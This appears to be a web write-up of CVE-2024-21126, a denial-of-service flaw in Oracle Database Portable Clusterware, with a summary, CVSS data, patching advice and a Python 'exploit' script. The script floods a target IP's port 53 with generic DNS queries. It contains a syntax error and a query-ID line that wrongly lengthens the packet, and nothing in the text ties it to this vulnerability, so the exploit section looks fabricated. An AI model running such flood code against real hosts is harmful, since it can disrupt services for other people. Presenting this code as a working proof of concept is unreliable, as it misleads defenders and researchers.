CVE-2024-21126: Vulnerability Alert in Oracle Database Portable Clusterware

A new vulnerability, CVE-2024-21126, has surfaced in the Oracle Database Portable Clusterware component of Oracle Database Server. Supported versions that are affected by this vulnerability are 19.3-19.23 and 21.3-21.14. This easily exploitable vulnerability allows an unauthenticated attacker with network access via DNS to compromise Oracle Database Portable Clusterware. While the vulnerability is in Oracle Database Portable Clusterware, attacks may significantly impact additional products, causing a change in scope. Successful attacks of this vulnerability can result in an unauthorized ability to cause a partial denial of service (partial DoS) in Oracle Database Portable Clusterware. The CVSS 3.1 Base Score for this vulnerability is 5.8, primarily affecting the availability of the component. The CVSS Vector is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L.

1. NVD - CVE-2024-21126 - Official documentation of the vulnerability from the National Vulnerability Database.
2. Oracle Security Advisory - Official security advisory from Oracle, including a list of affected products and versions, and patches available.

Exploit Details

The vulnerability in Oracle Database Portable Clusterware enables an attacker to conduct a partial denial of service (DoS) attack without authentication. An attacker may exploit the vulnerability by sending specifically crafted DNS packets to an exposed Clusterware component. The exploit will then cause the targeted system to become unresponsive, resulting in partial unavailability of the entire system.

Code Snippet

The following code snippet demonstrates how an attacker might craft DNS packets to exploit this vulnerability:

import socket
import random
import sys

target_ip = sys.argv[1]
target_port = 53

packet = b'\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x07example\x03com\x00\x00\x01\x00\x01'

for _ in range(10000):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(packet, (target_ip, target_port))

    # change the query ID in the packet
    packet = packet[:] + bytes([random.randint(, 255), random.randint(, 255)]) + packet[2:]

It is essential to update the Clusterware components to the latest available patches to mitigate this vulnerability effectively. Oracle has released patches to address this vulnerability, and they can be found in the official Oracle Security Advisory mentioned above.

Conclusion

CVE-2024-21126 poses a significant risk to Oracle Database Portable Clusterware, and taking appropriate action is necessary. It is crucial to apply the latest patches provided by Oracle and take appropriate precautions to guard against the possibility of unauthorized access and attack.

Timeline

Published on: 07/16/2024 23:15:12 UTC
Last modified on: 08/29/2024 20:36:00 UTC